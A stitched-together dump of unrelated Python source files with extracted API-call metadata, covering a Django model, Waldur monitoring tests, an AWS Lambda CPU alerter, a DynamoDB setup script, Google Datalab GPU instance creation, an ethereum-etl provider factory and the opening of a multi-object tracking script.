'([twice_disparity, corresponding_rgb], dim=1)\n', (3963, 4008), False, 'import torch\n'), ((4136, 4157), 'torch.nn.ReLU', 'nn.ReLU', ([], {'inplace': '(True)'}), '(inplace=True)\n', (4143, 4157), True, 'import torch.nn as nn\n'), ((1965, 2035), 'torch.nn.Conv2d', 'nn.Conv2d', (['in_channel', 'out_channel'], {'kernel_size': '(5)', 'stride': '(2)', 'padding': '(2)'}), '(in_channel, out_channel, kernel_size=5, stride=2, padding=2)\n', (1974, 2035), True, 'import torch.nn as nn\n'), ((5051, 5097), 'torch.nn.LeakyReLU', 'nn.LeakyReLU', ([], {'negative_slope': '(0.2)', 'inplace': '(True)'}), '(negative_slope=0.2, inplace=True)\n', (5063, 5097), True, 'import torch.nn as nn\n'), ((7278, 7322), 'torch.unsqueeze', 'torch.unsqueeze', (['pred_pyramid_list[i]'], {'dim': '(1)'}), '(pred_pyramid_list[i], dim=1)\n', (7293, 7322), False, 'import torch\n'), ((7645, 7678), 'torch.FloatTensor', 'torch.FloatTensor', (['(1)', '(3)', '(540)', '(960)'], {}), '(1, 3, 540, 960)\n', (7662, 7678), False, 'import torch\n')]
|
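disparityregression above is a soft argmax over the cost volume: a softmax along the disparity axis followed by an expectation over disparity indices. A CPU-only sketch of the same computation:

import torch
import torch.nn.functional as F

def soft_argmax_disparity(cost):
    # cost: (N, D, H, W) matching cost over D disparity hypotheses
    prob = F.softmax(cost, dim=1)
    d = cost.size(1)
    disp_values = torch.arange(d, dtype=prob.dtype).view(1, d, 1, 1)
    return torch.sum(prob * disp_values, dim=1)  # (N, H, W) expected disparity

pred = soft_argmax_disparity(torch.randn(2, 48, 16, 32))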
from django.db import models
from Apps.usuario.models import usuario
# Create your models here.
class Paciente(usuario):
contrato = models.CharField(max_length=100)
class Meta:
managed = False
db_table = 'paciente'
|
[
"django.db.models.CharField"
] |
[((142, 174), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(100)'}), '(max_length=100)\n', (158, 174), False, 'from django.db import models\n')]
|
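managed = False points a model at a pre-existing table that Django migrations must not create, alter, or drop. A standalone sketch of the same idiom (table and field names hypothetical; it must live inside a configured Django app):

from django.db import models

class LegacyPerson(models.Model):
    name = models.CharField(max_length=100)

    class Meta:
        managed = False             # migrations leave this table alone
        db_table = 'legacy_person'  # map onto the existing table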
import unittest
import datetime
from rest_framework import status, test
from rest_framework.reverse import reverse
from waldur_core.core.utils import datetime_to_timestamp
from waldur_core.structure.tests.factories import TestNewInstanceFactory, TestServiceProjectLinkFactory, UserFactory
from ..models import ResourceSla, ResourceItem, ResourceSlaStateTransition
from ..utils import format_period
class BaseMonitoringTest(test.APITransactionTestCase):
def setUp(self):
self.link = TestServiceProjectLinkFactory()
self.vm1 = TestNewInstanceFactory(service_project_link=self.link)
self.vm2 = TestNewInstanceFactory(service_project_link=self.link)
self.vm3 = TestNewInstanceFactory(service_project_link=self.link)
self.client.force_authenticate(UserFactory(is_staff=True))
@unittest.skip('Monitoring is not supported by structure yet.')
class SlaTest(BaseMonitoringTest):
def setUp(self):
super(SlaTest, self).setUp()
today = datetime.date.today()
period = format_period(today)
invalid_date = today + datetime.timedelta(days=100)
invalid_period = format_period(invalid_date)
ResourceSla.objects.create(scope=self.vm1, period=period, value=90)
ResourceSla.objects.create(scope=self.vm1, period=invalid_period, value=70)
ResourceSla.objects.create(scope=self.vm2, period=period, value=80)
def test_sorting(self):
response = self.client.get(TestNewInstanceFactory.get_list_url(), data={'o': 'actual_sla'})
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(2, len(response.data))
self.assertEqual([80, 90], [item['sla']['value'] for item in response.data])
def test_filtering(self):
response = self.client.get(TestNewInstanceFactory.get_list_url(), data={'actual_sla': 80})
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(1, len(response.data))
def test_actual_sla_serializer(self):
response = self.client.get(TestNewInstanceFactory.get_url(self.vm1))
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(90, response.data['sla']['value'])
@unittest.skip('Monitoring is not supported by structure yet.')
class EventsTest(BaseMonitoringTest):
def setUp(self):
super(EventsTest, self).setUp()
today = datetime.date.today()
timestamp = datetime_to_timestamp(today)
period = format_period(today)
ResourceSlaStateTransition.objects.create(scope=self.vm1, period=period, timestamp=timestamp, state=True)
ResourceSlaStateTransition.objects.create(scope=self.vm2, period=period, timestamp=timestamp, state=False)
self.url = reverse('resource-sla-state-transition-list')
def test_scope_filter(self):
vm1_url = TestNewInstanceFactory.get_url(self.vm1)
response = self.client.get(self.url, data={'scope': vm1_url})
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual('U', response.data[0]['state'])
vm2_url = TestNewInstanceFactory.get_url(self.vm2)
response = self.client.get(self.url, data={'scope': vm2_url})
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual('D', response.data[0]['state'])
def test_period_filter(self):
url = reverse('resource-sla-state-transition-list')
today = datetime.date.today()
invalid_date = today + datetime.timedelta(days=100)
invalid_period = format_period(invalid_date)
response = self.client.get(url, data={'period': invalid_period})
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(0, len(response.data))
@unittest.skip('Monitoring is not supported by structure yet.')
class ItemTest(BaseMonitoringTest):
def setUp(self):
super(ItemTest, self).setUp()
ResourceItem.objects.create(scope=self.vm1, name='application_status', value=1)
ResourceItem.objects.create(scope=self.vm2, name='application_status', value=0)
ResourceItem.objects.create(scope=self.vm1, name='ram_usage', value=10)
ResourceItem.objects.create(scope=self.vm2, name='ram_usage', value=20)
def test_serializer(self):
response = self.client.get(TestNewInstanceFactory.get_url(self.vm1))
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual({'application_status': 1, 'ram_usage': 10},
response.data['monitoring_items'])
def test_filter(self):
response = self.client.get(TestNewInstanceFactory.get_list_url(),
data={'monitoring__application_status': 1})
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(1, len(response.data))
def test_sorter(self):
response = self.client.get(TestNewInstanceFactory.get_list_url(),
data={'o': 'monitoring__application_status'})
self.assertEqual(response.status_code, status.HTTP_200_OK)
values = []
for item in response.data:
if not item['monitoring_items']:
values.append(None)
else:
values.append(item['monitoring_items']['application_status'])
self.assertEqual([0, 1], values)
|
[
"waldur_core.structure.tests.factories.TestNewInstanceFactory",
"waldur_core.core.utils.datetime_to_timestamp",
"waldur_core.structure.tests.factories.UserFactory",
"datetime.date.today",
"rest_framework.reverse.reverse",
"unittest.skip",
"datetime.timedelta",
"waldur_core.structure.tests.factories.TestNewInstanceFactory.get_list_url",
"waldur_core.structure.tests.factories.TestServiceProjectLinkFactory",
"waldur_core.structure.tests.factories.TestNewInstanceFactory.get_url"
] |
[((823, 885), 'unittest.skip', 'unittest.skip', (['"""Monitoring is not supported by structure yet."""'], {}), "('Monitoring is not supported by structure yet.')\n", (836, 885), False, 'import unittest\n'), ((2231, 2293), 'unittest.skip', 'unittest.skip', (['"""Monitoring is not supported by structure yet."""'], {}), "('Monitoring is not supported by structure yet.')\n", (2244, 2293), False, 'import unittest\n'), ((3795, 3857), 'unittest.skip', 'unittest.skip', (['"""Monitoring is not supported by structure yet."""'], {}), "('Monitoring is not supported by structure yet.')\n", (3808, 3857), False, 'import unittest\n'), ((499, 530), 'waldur_core.structure.tests.factories.TestServiceProjectLinkFactory', 'TestServiceProjectLinkFactory', ([], {}), '()\n', (528, 530), False, 'from waldur_core.structure.tests.factories import TestNewInstanceFactory, TestServiceProjectLinkFactory, UserFactory\n'), ((550, 604), 'waldur_core.structure.tests.factories.TestNewInstanceFactory', 'TestNewInstanceFactory', ([], {'service_project_link': 'self.link'}), '(service_project_link=self.link)\n', (572, 604), False, 'from waldur_core.structure.tests.factories import TestNewInstanceFactory, TestServiceProjectLinkFactory, UserFactory\n'), ((624, 678), 'waldur_core.structure.tests.factories.TestNewInstanceFactory', 'TestNewInstanceFactory', ([], {'service_project_link': 'self.link'}), '(service_project_link=self.link)\n', (646, 678), False, 'from waldur_core.structure.tests.factories import TestNewInstanceFactory, TestServiceProjectLinkFactory, UserFactory\n'), ((698, 752), 'waldur_core.structure.tests.factories.TestNewInstanceFactory', 'TestNewInstanceFactory', ([], {'service_project_link': 'self.link'}), '(service_project_link=self.link)\n', (720, 752), False, 'from waldur_core.structure.tests.factories import TestNewInstanceFactory, TestServiceProjectLinkFactory, UserFactory\n'), ((996, 1017), 'datetime.date.today', 'datetime.date.today', ([], {}), '()\n', (1015, 1017), False, 'import datetime\n'), ((2410, 2431), 'datetime.date.today', 'datetime.date.today', ([], {}), '()\n', (2429, 2431), False, 'import datetime\n'), ((2452, 2480), 'waldur_core.core.utils.datetime_to_timestamp', 'datetime_to_timestamp', (['today'], {}), '(today)\n', (2473, 2480), False, 'from waldur_core.core.utils import datetime_to_timestamp\n'), ((2769, 2814), 'rest_framework.reverse.reverse', 'reverse', (['"""resource-sla-state-transition-list"""'], {}), "('resource-sla-state-transition-list')\n", (2776, 2814), False, 'from rest_framework.reverse import reverse\n'), ((2867, 2907), 'waldur_core.structure.tests.factories.TestNewInstanceFactory.get_url', 'TestNewInstanceFactory.get_url', (['self.vm1'], {}), '(self.vm1)\n', (2897, 2907), False, 'from waldur_core.structure.tests.factories import TestNewInstanceFactory, TestServiceProjectLinkFactory, UserFactory\n'), ((3121, 3161), 'waldur_core.structure.tests.factories.TestNewInstanceFactory.get_url', 'TestNewInstanceFactory.get_url', (['self.vm2'], {}), '(self.vm2)\n', (3151, 3161), False, 'from waldur_core.structure.tests.factories import TestNewInstanceFactory, TestServiceProjectLinkFactory, UserFactory\n'), ((3405, 3450), 'rest_framework.reverse.reverse', 'reverse', (['"""resource-sla-state-transition-list"""'], {}), "('resource-sla-state-transition-list')\n", (3412, 3450), False, 'from rest_framework.reverse import reverse\n'), ((3468, 3489), 'datetime.date.today', 'datetime.date.today', ([], {}), '()\n', (3487, 3489), False, 'import datetime\n'), ((792, 818), 
'waldur_core.structure.tests.factories.UserFactory', 'UserFactory', ([], {'is_staff': '(True)'}), '(is_staff=True)\n', (803, 818), False, 'from waldur_core.structure.tests.factories import TestNewInstanceFactory, TestServiceProjectLinkFactory, UserFactory\n'), ((1088, 1116), 'datetime.timedelta', 'datetime.timedelta', ([], {'days': '(100)'}), '(days=100)\n', (1106, 1116), False, 'import datetime\n'), ((1471, 1508), 'waldur_core.structure.tests.factories.TestNewInstanceFactory.get_list_url', 'TestNewInstanceFactory.get_list_url', ([], {}), '()\n', (1506, 1508), False, 'from waldur_core.structure.tests.factories import TestNewInstanceFactory, TestServiceProjectLinkFactory, UserFactory\n'), ((1802, 1839), 'waldur_core.structure.tests.factories.TestNewInstanceFactory.get_list_url', 'TestNewInstanceFactory.get_list_url', ([], {}), '()\n', (1837, 1839), False, 'from waldur_core.structure.tests.factories import TestNewInstanceFactory, TestServiceProjectLinkFactory, UserFactory\n'), ((2059, 2099), 'waldur_core.structure.tests.factories.TestNewInstanceFactory.get_url', 'TestNewInstanceFactory.get_url', (['self.vm1'], {}), '(self.vm1)\n', (2089, 2099), False, 'from waldur_core.structure.tests.factories import TestNewInstanceFactory, TestServiceProjectLinkFactory, UserFactory\n'), ((3521, 3549), 'datetime.timedelta', 'datetime.timedelta', ([], {'days': '(100)'}), '(days=100)\n', (3539, 3549), False, 'import datetime\n'), ((4358, 4398), 'waldur_core.structure.tests.factories.TestNewInstanceFactory.get_url', 'TestNewInstanceFactory.get_url', (['self.vm1'], {}), '(self.vm1)\n', (4388, 4398), False, 'from waldur_core.structure.tests.factories import TestNewInstanceFactory, TestServiceProjectLinkFactory, UserFactory\n'), ((4659, 4696), 'waldur_core.structure.tests.factories.TestNewInstanceFactory.get_list_url', 'TestNewInstanceFactory.get_list_url', ([], {}), '()\n', (4694, 4696), False, 'from waldur_core.structure.tests.factories import TestNewInstanceFactory, TestServiceProjectLinkFactory, UserFactory\n'), ((4955, 4992), 'waldur_core.structure.tests.factories.TestNewInstanceFactory.get_list_url', 'TestNewInstanceFactory.get_list_url', ([], {}), '()\n', (4990, 4992), False, 'from waldur_core.structure.tests.factories import TestNewInstanceFactory, TestServiceProjectLinkFactory, UserFactory\n')]
|
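The tests above lean on two small waldur_core helpers. Plausible stand-ins with the semantics the tests appear to assume (formats are guesses, not the library's actual implementation):

import calendar
import datetime

def datetime_to_timestamp(d):
    # POSIX timestamp for a date or datetime, assuming UTC
    if not isinstance(d, datetime.datetime):
        d = datetime.datetime(d.year, d.month, d.day)
    return calendar.timegm(d.timetuple())

def format_period(d):
    return d.strftime('%Y-%m')  # 'YYYY-MM' period key (assumed format)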
import json
import boto3
# configuration
alerts_queue_name = "alerts-queue"
# AWS SDK clients
s3 = boto3.client("s3")
sqs = boto3.client("sqs")
# =============
# HELPER METHOD
# =============
def read_s3_object(bucket, key) -> str:
data = s3.get_object(Bucket=bucket, Key=key)
return data["Body"].read().decode("utf-8")
def read_changed_object(event) -> str:
s3_event = event["Records"][0]["s3"]
bucket = s3_event["bucket"]["name"]
key = s3_event["object"]["key"]
return read_s3_object(bucket, key)
# ==============
# Lambda handler
# ==============
def handler(event, context):
print("invoking function")
if "Records" not in event:
print("invocation not triggered by an event")
return
# resolve the queue to publish alerts to
alerts_queue_url = sqs.get_queue_url(QueueName=alerts_queue_name)['QueueUrl']
log_content = read_changed_object(event)
print("log content")
print(log_content)
# parse structured log records
records = [json.loads(line) for line in log_content.split("\n") if line.strip()]
alerts = []
print("HELLO FRB!")
for record in records:
# filter log records to create alerts
try:
alert = None
            # TODO: adjust the thresholds here
if record['cpu'] >= 90:
alert = {"timestamp": record['timestamp'], "level": "CRITICAL", "message": "Critical CPU utilization"}
elif record['cpu'] >= 60:
alert = {"timestamp": record['timestamp'], "level": "WARNING", "message": "High CPU utilization"}
if alert:
print("alert", alert)
alerts.append(alert)
sqs.send_message(MessageBody=json.dumps(alert), QueueUrl=alerts_queue_url)
except KeyError:
pass
|
[
"json.loads",
"boto3.client",
"json.dumps"
] |
[((102, 120), 'boto3.client', 'boto3.client', (['"""s3"""'], {}), "('s3')\n", (114, 120), False, 'import boto3\n'), ((127, 146), 'boto3.client', 'boto3.client', (['"""sqs"""'], {}), "('sqs')\n", (139, 146), False, 'import boto3\n'), ((1022, 1038), 'json.loads', 'json.loads', (['line'], {}), '(line)\n', (1032, 1038), False, 'import json\n'), ((1747, 1764), 'json.dumps', 'json.dumps', (['alert'], {}), '(alert)\n', (1757, 1764), False, 'import json\n')]
|
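handler() only reads the bucket name and object key out of the event, so it can be exercised with a hand-built payload (values hypothetical; a real invocation still needs AWS credentials, the S3 object, and the alerts queue):

fake_event = {
    'Records': [
        {'s3': {'bucket': {'name': 'metrics-bucket'},
                'object': {'key': 'logs/host-1.jsonl'}}}
    ]
}
# handler(fake_event, context=None)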
import boto3
def create_movie_table(dynamodb=None):
    # honor an injected resource; otherwise default to the local endpoint
    if not dynamodb:
        dynamodb = boto3.resource("dynamodb", endpoint_url="http://localhost:8000")
table = dynamodb.create_table(
TableName="Movies",
KeySchema=[
{"AttributeName": "year", "KeyType": "HASH"}, # Partition key
{"AttributeName": "title", "KeyType": "RANGE"}, # Sort key
],
AttributeDefinitions=[
{"AttributeName": "year", "AttributeType": "N"},
{"AttributeName": "title", "AttributeType": "S"},
],
ProvisionedThroughput={"ReadCapacityUnits": 10, "WriteCapacityUnits": 10},
)
return table
if __name__ == "__main__":
movie_table = create_movie_table()
|
[
"boto3.resource"
] |
[((69, 133), 'boto3.resource', 'boto3.resource', (['"""dynamodb"""'], {'endpoint_url': '"""http://localhost:8000"""'}), "('dynamodb', endpoint_url='http://localhost:8000')\n", (83, 133), False, 'import boto3\n')]
|
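A quick smoke test against the table created above, using the same local endpoint (item values are hypothetical):

import boto3

dynamodb = boto3.resource('dynamodb', endpoint_url='http://localhost:8000')
table = dynamodb.Table('Movies')
table.put_item(Item={'year': 2015, 'title': 'The Big New Movie'})
resp = table.get_item(Key={'year': 2015, 'title': 'The Big New Movie'})
print(resp.get('Item'))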
# Copyright 2016 Google Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Methods for implementing the `datalab beta creategpu` command."""
import os
import tempfile
import create
import connect
import utils
description = ("""`{0} {1}` creates a new Datalab instance running in a Google
Compute Engine VM with a GPU.
This command also creates the 'datalab-network' network if necessary.
By default, the command creates a persistent connection to the newly
created instance. You can disable that behavior by passing in the
'--no-connect' flag.""")
_NVIDIA_PACKAGE = 'cuda-repo-ubuntu1604_8.0.61-1_amd64.deb'
_THIRD_PARTY_SOFTWARE_DIALOG = (
"""By accepting below, you will download and install the
following third-party software onto your managed GCE instances:
NVidia GPU CUDA Toolkit Drivers: """ + _NVIDIA_PACKAGE)
_DATALAB_STARTUP_SCRIPT = create._DATALAB_BASE_STARTUP_SCRIPT + """
install_cuda() {{
# Check for CUDA and try to install.
if ! dpkg-query -W cuda; then
curl -O http://developer.download.nvidia.com/\
compute/cuda/repos/ubuntu1604/x86_64/{6}
dpkg -i ./{6}
apt-get update -y
apt-get install cuda -y
fi
}}
install_nvidia_docker() {{
# Install normal docker then install nvidia-docker
if ! dpkg-query -W docker; then
curl -sSL https://get.docker.com/ | sh
curl -L -O https://github.com/NVIDIA/nvidia-docker/releases/\
download/v1.0.1/nvidia-docker_1.0.1-1_amd64.deb
dpkg -i ./nvidia-docker_1.0.1-1_amd64.deb
apt-get update -y
apt-get install nvidia-docker -y
fi
}}
cleanup_packages() {{
apt-get update -y
apt-get remove -y dnsmasq-base || true
}}
pull_datalab_image() {{
if [[ "$(docker images -q {0})" == "" ]]; then
gcloud docker -- pull {0} ;
fi
}}
start_datalab_docker() {{
nvidia-docker run --restart always -p '127.0.0.1:8080:8080' \
-e DATALAB_ENV='GCE' -e DATALAB_DEBUG='true' \
-e DATALAB_SETTINGS_OVERRIDES=\
'{{"enableAutoGCSBackups": {3}, "consoleLogLevel": "{4}" }}' \
-e DATALAB_GIT_AUTHOR='{5}' \
-v "${{MOUNT_DIR}}/content:/content" \
-v "${{MOUNT_DIR}}/tmp:/tmp" \
{0} -c /datalab/run.sh
}}
start_fluentd_docker() {{
docker run --restart always \
-e FLUENTD_ARGS='-q' \
-v /var/log:/var/log \
-v /var/lib/docker/containers:/var/lib/docker/containers:ro \
gcr.io/google_containers/fluentd-gcp:1.18
}}
cleanup_packages
install_cuda
install_nvidia_docker
cleanup_packages
pull_datalab_image
mount_and_prepare_disk
configure_swap
cleanup_tmp
start_datalab_docker
start_fluentd_docker
journalctl -u google-startup-scripts --no-pager > /var/log/startupscript.log
"""
def flags(parser):
"""Add command line flags for the `create` subcommand.
Args:
parser: The argparse parser to which to add the flags.
"""
create.flags(parser)
parser.set_defaults(image_name='gcr.io/cloud-datalab/datalab-gpu:latest')
parser.add_argument(
'--accelerator-type',
dest='accelerator_type',
default='nvidia-tesla-k80',
help=(
'the accelerator type of the instance.'
'\n\n'
'Datalab currently only supports nvidia-tesla-k80.'
'\n\n'
            'If not specified, the default is nvidia-tesla-k80.'))
parser.add_argument(
'--accelerator-count',
dest='accelerator_count',
type=int,
default=1,
help=(
'the accelerator count of the instance, used if '
'accelerator-type is specified.'
'\n\n'
            'If not specified, the default count is 1.'))
return
def run(args, gcloud_beta_compute, gcloud_repos,
email='', in_cloud_shell=False, gcloud_zone=None, **kwargs):
"""Implementation of the `datalab create` subcommand.
Args:
args: The Namespace instance returned by argparse
gcloud_beta_compute: Function that can be used to invoke `gcloud compute`
gcloud_repos: Function that can be used to invoke
`gcloud source repos`
email: The user's email address
in_cloud_shell: Whether or not the command is being run in the
Google Cloud Shell
gcloud_zone: The zone that gcloud is configured to use
Raises:
subprocess.CalledProcessError: If a nested `gcloud` calls fails
"""
if not utils.prompt_for_confirmation(
args=args,
message=_THIRD_PARTY_SOFTWARE_DIALOG,
question='Do you accept',
accept_by_default=False):
print('Installation not accepted; Exiting.')
return
if (not args.zone) and (not args.disk_name):
args.zone = gcloud_zone
if (not args.zone) and (not args.quiet):
args.zone = utils.prompt_for_zone(args, gcloud_beta_compute)
disk_cfg = create.prepare(args, gcloud_beta_compute, gcloud_repos)
print('Creating the instance {0}'.format(args.instance))
print('\n\nDue to GPU Driver installation, please note that '
'Datalab GPU instances take significantly longer to '
'startup compared to non-GPU instances.')
cmd = ['instances', 'create']
if args.zone:
cmd.extend(['--zone', args.zone])
enable_swap = "false" if args.no_swap else "true"
enable_backups = "false" if args.no_backups else "true"
console_log_level = args.log_level or "warn"
user_email = args.for_user or email
service_account = args.service_account or "default"
# We have to escape the user's email before using it in the YAML template.
escaped_email = user_email.replace("'", "''")
with tempfile.NamedTemporaryFile(delete=False) as startup_script_file, \
tempfile.NamedTemporaryFile(delete=False) as for_user_file:
try:
startup_script_file.write(_DATALAB_STARTUP_SCRIPT.format(
args.image_name, create._DATALAB_NOTEBOOKS_REPOSITORY,
enable_swap, enable_backups, console_log_level,
escaped_email, _NVIDIA_PACKAGE))
startup_script_file.close()
for_user_file.write(user_email)
for_user_file.close()
metadata_template = (
'startup-script={0},' +
'for-user={1}')
metadata_from_file = (
metadata_template.format(
startup_script_file.name,
for_user_file.name))
cmd.extend([
'--format=none',
'--boot-disk-size=20GB',
'--network', args.network_name,
'--image-family', 'ubuntu-1604-lts',
'--image-project', 'ubuntu-os-cloud',
'--machine-type', args.machine_type,
'--accelerator',
'type=' + args.accelerator_type + ',count='
+ str(args.accelerator_count),
'--maintenance-policy', 'TERMINATE', '--restart-on-failure',
'--metadata-from-file', metadata_from_file,
'--tags', 'datalab',
'--disk', disk_cfg,
'--service-account', service_account,
'--scopes', 'cloud-platform',
args.instance])
gcloud_beta_compute(args, cmd)
finally:
os.remove(startup_script_file.name)
os.remove(for_user_file.name)
if (not args.no_connect) and (not args.for_user):
connect.connect(args, gcloud_beta_compute, email, in_cloud_shell)
return
|
[
"tempfile.NamedTemporaryFile",
"os.remove",
"utils.prompt_for_confirmation",
"create.flags",
"utils.prompt_for_zone",
"connect.connect",
"create.prepare"
] |
[((3306, 3326), 'create.flags', 'create.flags', (['parser'], {}), '(parser)\n', (3318, 3326), False, 'import create\n'), ((5262, 5317), 'create.prepare', 'create.prepare', (['args', 'gcloud_beta_compute', 'gcloud_repos'], {}), '(args, gcloud_beta_compute, gcloud_repos)\n', (5276, 5317), False, 'import create\n'), ((4803, 4941), 'utils.prompt_for_confirmation', 'utils.prompt_for_confirmation', ([], {'args': 'args', 'message': '_THIRD_PARTY_SOFTWARE_DIALOG', 'question': '"""Do you accept"""', 'accept_by_default': '(False)'}), "(args=args, message=\n _THIRD_PARTY_SOFTWARE_DIALOG, question='Do you accept',\n accept_by_default=False)\n", (4832, 4941), False, 'import utils\n'), ((5198, 5246), 'utils.prompt_for_zone', 'utils.prompt_for_zone', (['args', 'gcloud_beta_compute'], {}), '(args, gcloud_beta_compute)\n', (5219, 5246), False, 'import utils\n'), ((6052, 6093), 'tempfile.NamedTemporaryFile', 'tempfile.NamedTemporaryFile', ([], {'delete': '(False)'}), '(delete=False)\n', (6079, 6093), False, 'import tempfile\n'), ((6132, 6173), 'tempfile.NamedTemporaryFile', 'tempfile.NamedTemporaryFile', ([], {'delete': '(False)'}), '(delete=False)\n', (6159, 6173), False, 'import tempfile\n'), ((7849, 7914), 'connect.connect', 'connect.connect', (['args', 'gcloud_beta_compute', 'email', 'in_cloud_shell'], {}), '(args, gcloud_beta_compute, email, in_cloud_shell)\n', (7864, 7914), False, 'import connect\n'), ((7708, 7743), 'os.remove', 'os.remove', (['startup_script_file.name'], {}), '(startup_script_file.name)\n', (7717, 7743), False, 'import os\n'), ((7756, 7785), 'os.remove', 'os.remove', (['for_user_file.name'], {}), '(for_user_file.name)\n', (7765, 7785), False, 'import os\n')]
|
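run() above writes metadata into NamedTemporaryFile(delete=False) so the file outlives the with-block long enough for gcloud to read it by name, then removes it in a finally. The pattern in isolation (mode='w' added for Python 3; the original targets Python 2, where the default binary mode accepts str):

import os
import tempfile

with tempfile.NamedTemporaryFile(mode='w', delete=False) as f:
    f.write('#!/bin/bash\necho hello\n')
    path = f.name  # hand this path to the external tool
try:
    print('startup script at', path)
finally:
    os.remove(path)  # explicit cleanup because delete=False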
import os
from web3 import HTTPProvider
from ethereumetl.providers.rpc import BatchHTTPProvider
from tests.ethereumetl.job.mock_batch_web3_provider import MockBatchWeb3Provider
from tests.ethereumetl.job.mock_web3_provider import MockWeb3Provider
def get_web3_provider(provider_type, read_resource_lambda=None, batch=False):
if provider_type == 'mock':
if read_resource_lambda is None:
            raise ValueError('read_resource_lambda must not be None for provider type {}'.format(provider_type))
if batch:
provider = MockBatchWeb3Provider(read_resource_lambda)
else:
provider = MockWeb3Provider(read_resource_lambda)
elif provider_type == 'infura':
provider_url = os.environ.get('PROVIDER_URL', 'https://mainnet.infura.io/v3/7aef3f0cd1f64408b163814b22cc643c')
if batch:
provider = BatchHTTPProvider(provider_url)
else:
provider = HTTPProvider(provider_url)
else:
raise ValueError('Provider type {} is unexpected'.format(provider_type))
return provider
|
[
"tests.ethereumetl.job.mock_web3_provider.MockWeb3Provider",
"tests.ethereumetl.job.mock_batch_web3_provider.MockBatchWeb3Provider",
"os.environ.get",
"web3.HTTPProvider",
"ethereumetl.providers.rpc.BatchHTTPProvider"
] |
[((558, 601), 'tests.ethereumetl.job.mock_batch_web3_provider.MockBatchWeb3Provider', 'MockBatchWeb3Provider', (['read_resource_lambda'], {}), '(read_resource_lambda)\n', (579, 601), False, 'from tests.ethereumetl.job.mock_batch_web3_provider import MockBatchWeb3Provider\n'), ((639, 677), 'tests.ethereumetl.job.mock_web3_provider.MockWeb3Provider', 'MockWeb3Provider', (['read_resource_lambda'], {}), '(read_resource_lambda)\n', (655, 677), False, 'from tests.ethereumetl.job.mock_web3_provider import MockWeb3Provider\n'), ((737, 836), 'os.environ.get', 'os.environ.get', (['"""PROVIDER_URL"""', '"""https://mainnet.infura.io/v3/7aef3f0cd1f64408b163814b22cc643c"""'], {}), "('PROVIDER_URL',\n 'https://mainnet.infura.io/v3/7aef3f0cd1f64408b163814b22cc643c')\n", (751, 836), False, 'import os\n'), ((874, 905), 'ethereumetl.providers.rpc.BatchHTTPProvider', 'BatchHTTPProvider', (['provider_url'], {}), '(provider_url)\n', (891, 905), False, 'from ethereumetl.providers.rpc import BatchHTTPProvider\n'), ((943, 969), 'web3.HTTPProvider', 'HTTPProvider', (['provider_url'], {}), '(provider_url)\n', (955, 969), False, 'from web3 import HTTPProvider\n')]
|
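Hypothetical usage of the factory above; the 'infura' branch falls back to the PROVIDER_URL environment variable when it is set:

# provider = get_web3_provider('infura', batch=True)
# provider = get_web3_provider('mock', read_resource_lambda=lambda name: '{}')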
# ------------------------------------------------------------------------
# Copyright (c) 2021 4669 (for eccv submission only). All Rights Reserved.
# ------------------------------------------------------------------------
# Modified from Deformable DETR (https://github.com/fundamentalvision/Deformable-DETR)
# Copyright (c) 2020 SenseTime. All Rights Reserved.
# ------------------------------------------------------------------------
# Modified from DETR (https://github.com/facebookresearch/detr)
# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved
# ------------------------------------------------------------------------
"""
SORT: A Simple, Online and Realtime Tracker
Copyright (C) 2016-2020 <NAME> <EMAIL>
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
from __future__ import print_function
import os
import numpy as np
import random
import argparse
import torchvision.transforms.functional as F
import torch
import cv2
from tqdm import tqdm
from pathlib import Path
from PIL import Image, ImageDraw
from models import build_model
from util.tool import load_model
from main import get_args_parser
from torch.nn.functional import interpolate
from typing import List
from util.evaluation import Evaluator
import motmetrics as mm
import shutil
from models.structures import Instances
from torch.utils.data import Dataset, DataLoader
np.random.seed(2020)
COLORS_10 = [(144, 238, 144), (178, 34, 34), (221, 160, 221), (0, 255, 0), (0, 128, 0), (210, 105, 30), (220, 20, 60),
(192, 192, 192), (255, 228, 196), (50, 205, 50), (139, 0, 139), (100, 149, 237), (138, 43, 226),
(238, 130, 238),
(255, 0, 255), (0, 100, 0), (127, 255, 0), (255, 0, 255), (0, 0, 205), (255, 140, 0), (255, 239, 213),
(199, 21, 133), (124, 252, 0), (147, 112, 219), (106, 90, 205), (176, 196, 222), (65, 105, 225),
(173, 255, 47),
(255, 20, 147), (219, 112, 147), (186, 85, 211), (199, 21, 133), (148, 0, 211), (255, 99, 71),
(144, 238, 144),
(255, 255, 0), (230, 230, 250), (0, 0, 255), (128, 128, 0), (189, 183, 107), (255, 255, 224),
(128, 128, 128),
(105, 105, 105), (64, 224, 208), (205, 133, 63), (0, 128, 128), (72, 209, 204), (139, 69, 19),
(255, 245, 238),
(250, 240, 230), (152, 251, 152), (0, 255, 255), (135, 206, 235), (0, 191, 255), (176, 224, 230),
(0, 250, 154),
(245, 255, 250), (240, 230, 140), (245, 222, 179), (0, 139, 139), (143, 188, 143), (255, 0, 0),
(240, 128, 128),
(102, 205, 170), (60, 179, 113), (46, 139, 87), (165, 42, 42), (178, 34, 34), (175, 238, 238),
(255, 248, 220),
(218, 165, 32), (255, 250, 240), (253, 245, 230), (244, 164, 96), (210, 105, 30)]
